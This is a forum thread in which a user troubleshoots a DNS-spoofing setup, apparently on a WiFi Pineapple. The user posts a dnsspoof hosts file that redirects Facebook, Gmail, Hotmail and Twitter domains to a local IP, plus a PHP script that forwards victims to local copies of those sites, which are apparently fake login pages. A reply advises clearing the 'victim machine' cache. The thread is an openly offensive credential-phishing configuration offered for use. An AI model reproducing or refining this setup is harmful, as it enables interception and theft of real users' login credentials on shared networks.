Jump to content

How to spoof multiple webs at same time with DNSSPOOF


daniboy92

Recommended Posts

Hi,

After try and try to have a dnsspoof working service i have it.

Now i'm trying to spoof multiple webs (facebook, twitter, gmail, hotmail, ebay... etc), but only i can spoof one web, only works with Facebook...

Is there a code on browsers or OS that block spoofing web pages?

This is my dnsspoof's hosts file:

172.16.42.1 example.com

172.16.42.1 *.facebook.*
172.16.42.1 *.gmail.*
172.16.42.1 *.hotmail.*
172.16.42.1 *.twitter.*

And this is my redirect file:

<?php

$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "example")){
header('Status: 302 Found');
header('Location: example.html');
}
if (strpos($ref, "facebook")){
header('Status: 302 Found');
header('Location: facebookES');
}
if (strpos($ref, "gmail")){
header('Status: 302 Found');
header('Location: gmailES');
}
if (strpos($ref, "hotmail")){
header('Status: 302 Found');
header('Location: hotmailES');
}
if (strpos($ref, "twitter")){
header('Status: 302 Found');
header('Location: twitterES');
}
require('error.php');
?>

The files aren't htm or html, there are shorcuts to the real htm files... But this is not the problem.

I don't know if there is something wrong in my Redirect.php file, my hosts file or it's a problem to prevents pineapple spoof varius webs at same time...

Edited by daniboy92
Link to comment
Share on other sites

Try to clean the browser cache of the victim machine and try again. Some times happens to me when the SSL connection is already stablished before I start dnsspoof.

Good luck~

I deleted all: cookies, cache, history, downloads... All i can clean in the browser...

But only can spoof Facebook.com and example.com

Edited by daniboy92
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...